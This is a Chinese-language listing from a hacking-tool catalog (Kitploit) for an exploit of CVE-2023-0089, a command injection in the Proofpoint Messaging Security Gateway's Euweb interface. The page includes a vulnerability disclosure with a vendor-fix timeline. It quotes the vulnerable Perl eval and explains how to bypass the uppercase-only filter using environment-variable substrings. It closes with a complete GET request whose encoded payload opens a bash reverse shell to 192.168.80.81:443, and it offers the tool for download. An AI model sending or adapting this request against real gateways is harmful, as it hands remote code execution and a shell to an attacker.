Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
proofpoint-CVE-2023-0089 — Proofpoint Email Gateway:低权限认证用户到管理员的远程代码执行(RCE) | Kitploit
工具/GitHubGitHub/ly1g3/proofpoint-cve-2023-0089
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubly1g3/proofpoint-cve-2023-0089

proofpoint-CVE-2023-0089

Proofpoint Email Gateway:低权限认证用户到管理员的远程代码执行(RCE)

查看仓库
112个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

关于

安全研究员:ly1g3,ly1g3[at]tuta.io

GPG 指纹:https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

概述:远程代码执行 - 从低权限认证用户到管理员 RCE

CVE:CVE-2023-0089

时间线:

  • 发现 - ly1g3
  • 报告 - ly1g3
  • 修复 - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Proofpoint Messaging Security Gateway 的漏洞利用

远程代码执行 (RCE)

Euweb 的一个低权限(已认证)用户能够以管理员权限执行任意代码。

技术细节

Euwebutils.pm 中的 getMsgType 函数存在命令注入漏洞。$module 变量来自 GET 参数,且此用户输入未经过任何过滤。

root@kitploit:~
sub getMsgType {
...
else {
		$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
	}

这个 getMsgType 函数被 Euweb 应用程序使用的许多 API 调用所使用,因此该漏洞可以通过多种方式触发。

由于所有字符都必须为大写,因此对于小写字母,可以使用环境变量绕过这一限制。示例:用 ${SHELL:1:1} 代替 b

由于使用了 use strict,可以在字符串开头添加 MAIL_GENERAL() 来补全 PROOFPOINT_MAIL_REPORT_MSGTYPE_。之后可以添加自定义的 Perl 代码。

未编码的示例载荷:MAIL_GENERAL();`id`

POC

使用环境变量编码的反向 Shell,用于绕过小写字母限制。代码以 pps 用户身份运行。

root@kitploit:~
GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261
下载工具